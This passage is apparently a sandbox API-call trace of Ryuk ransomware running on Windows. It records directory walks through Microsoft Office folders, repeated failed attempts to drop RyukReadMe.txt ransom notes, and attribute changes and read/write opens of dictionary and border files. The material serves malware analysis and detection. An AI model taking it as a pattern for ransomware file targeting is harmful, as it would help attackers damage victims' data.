office\\office14\\proof\\1036\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.610] GetLastError () returned 0x5 [0137.610] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.610] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.610] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.610] SetLastError (dwErrCode=0x0) [0137.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.610] GetLastError () returned 0x5 [0137.610] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.610] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.610] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d60 [0137.611] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.611] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.611] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.611] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.611] SetLastError (dwErrCode=0x0) [0137.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\3082\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.611] GetLastError () returned 0x5 [0137.611] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.611] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.611] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.611] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.611] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSGR3EN.LEX", dwFileAttributes=0x80) returned 0 [0137.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSGR3EN.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msgr3en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.612] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.612] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.612] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.612] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSGR3ES.LEX", dwFileAttributes=0x80) returned 0 [0137.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSGR3ES.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msgr3es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.613] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.613] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.613] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.613] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSGR3FR.LEX", dwFileAttributes=0x80) returned 0 [0137.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSGR3FR.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msgr3fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.620] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.620] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.621] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.621] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.621] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSHY7EN.LEX", dwFileAttributes=0x80) returned 0 [0137.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSHY7EN.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\mshy7en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.621] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.622] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.622] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.622] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.622] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSHY7ES.LEX", dwFileAttributes=0x80) returned 0 [0137.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSHY7ES.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\mshy7es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.622] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.622] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.622] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.622] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.622] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSHY7FR.LEX", dwFileAttributes=0x80) returned 0 [0137.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSHY7FR.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\mshy7fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.623] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.623] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.623] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.623] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7EN.dub", dwFileAttributes=0x80) returned 0 [0137.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7EN.dub" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\mssp7en.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.624] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.624] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.624] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.624] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7EN.LEX", dwFileAttributes=0x80) returned 0 [0137.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\mssp7en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.625] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.625] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.625] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.625] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.625] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7ES.dub", dwFileAttributes=0x80) returned 0 [0137.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7ES.dub" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\mssp7es.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.626] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.626] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.626] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.626] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.626] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7ES.LEX", dwFileAttributes=0x80) returned 0 [0137.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7ES.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\mssp7es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.626] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.627] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.627] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.627] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.627] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.627] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7FR.dub", dwFileAttributes=0x80) returned 0 [0137.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7FR.dub" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\mssp7fr.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.628] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.628] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.628] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.628] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.628] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7FR.LEX", dwFileAttributes=0x80) returned 0 [0137.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSSP7FR.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\mssp7fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.628] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.628] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.628] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.628] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.628] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7EN.LEX", dwFileAttributes=0x80) returned 0 [0137.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7EN.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msth7en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.629] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.629] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.629] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.629] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.629] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7ES.LEX", dwFileAttributes=0x80) returned 0 [0137.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7ES.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msth7es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.630] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.630] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.630] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.630] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.LEX", dwFileAttributes=0x80) returned 0 [0137.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msth7fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.631] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.632] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.632] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.632] SetLastError (dwErrCode=0x0) [0137.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.632] GetLastError () returned 0x5 [0137.632] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.632] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.632] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.632] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.632] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.632] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.632] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.632] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.632] SetLastError (dwErrCode=0x0) [0137.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.632] GetLastError () returned 0x5 [0137.632] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.632] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.632] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.634] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.634] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.634] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB10.BDR", dwFileAttributes=0x80) returned 0 [0137.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB10.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub10.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.635] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.635] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.635] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.635] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.635] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB11.BDR", dwFileAttributes=0x80) returned 0 [0137.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB11.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub11.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.635] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.635] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.635] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.635] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.635] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB1A.BDR", dwFileAttributes=0x80) returned 0 [0137.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB1A.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub1a.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.636] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.636] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.636] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.636] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.636] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB1B.BDR", dwFileAttributes=0x80) returned 0 [0137.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB1B.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub1b.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.636] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.636] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.636] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.636] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB2A.BDR", dwFileAttributes=0x80) returned 0 [0137.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB2A.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub2a.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.637] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.637] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.637] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.637] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB2B.BDR", dwFileAttributes=0x80) returned 0 [0137.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB2B.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub2b.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.637] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.637] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.638] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.638] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.638] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB3A.BDR", dwFileAttributes=0x80) returned 0 [0137.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB3A.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub3a.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.638] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.638] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.638] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.638] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.638] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB3B.BDR", dwFileAttributes=0x80) returned 0 [0137.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB3B.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub3b.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 